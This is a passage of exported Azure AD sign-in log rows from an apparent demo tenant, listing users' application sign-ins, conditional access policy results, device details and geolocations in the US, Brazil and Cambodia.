'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,ac9a90bc-e2ad-45f7-b2a8-b415040f1300,SigninLogs,Sucess,33.7984581,-84.38828278
+1622,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:47.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4a14479f-403c-0000-54b3-333a02277288,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",53b0f25d-c935-4697-96da-86164cd11200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,53b0f25d-c935-4697-96da-86164cd11200,SigninLogs,Sucess,33.7984581,-84.38828278
+1623,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:07.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bc9bf6d9-49c4-460c-b943-497c13889088,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",80d584c4-dd35-4dcb-882c-059379531200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,80d584c4-dd35-4dcb-882c-059379531200,SigninLogs,Sucess,33.7984581,-84.38828278
+1624,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4467206a-1431-4517-a1a3-1567e4905d6f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6f905d6a-b8b5-48fe-8361-59d7bee51200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6f905d6a-b8b5-48fe-8361-59d7bee51200,SigninLogs,Sucess,33.7984581,-84.38828278
+1625,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:02.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fc7af5d1-a23e-4733-803d-8c6f06c67937,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",53b0f25d-c935-4697-96da-861644d31200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,53b0f25d-c935-4697-96da-861644d31200,SigninLogs,Sucess,33.7984581,-84.38828278
+1626,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:06.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,96f72338-ab0c-4cbc-9e5c-f953804bf720,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4aca3199-2681-43b9-9160-589c11b31200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,4aca3199-2681-43b9-9160-589c11b31200,SigninLogs,Sucess,33.7984581,-84.38828278
+1627,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:25.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,02413a6d-f768-4bf2-96f8-b077353fe842,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",db359221-fdda-4bf1-8b37-6f469e580800,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,db359221-fdda-4bf1-8b37-6f469e580800,SigninLogs,Sucess,-20.54751015,-47.4056282
+1628,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:58.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2b9d038b-d15b-4793-b923-6ece48b222af,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",cbcd7f19-25f4-4cfd-824c-94dc18040600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,cbcd7f19-25f4-4cfd-824c-94dc18040600,SigninLogs,Sucess,-20.54751015,-47.4056282
+1629,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:40.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6e90d619-f4d9-4f64-ad44-392b85a37cd3,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:59,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",e82050b8-a2c4-426d-8c05-8f1dda290800,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,e82050b8-a2c4-426d-8c05-8f1dda290800,SigninLogs,Sucess,13,105
+1630,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:35.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d2317807-b76c-47be-8f8a-a3ecbd9d0241,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB 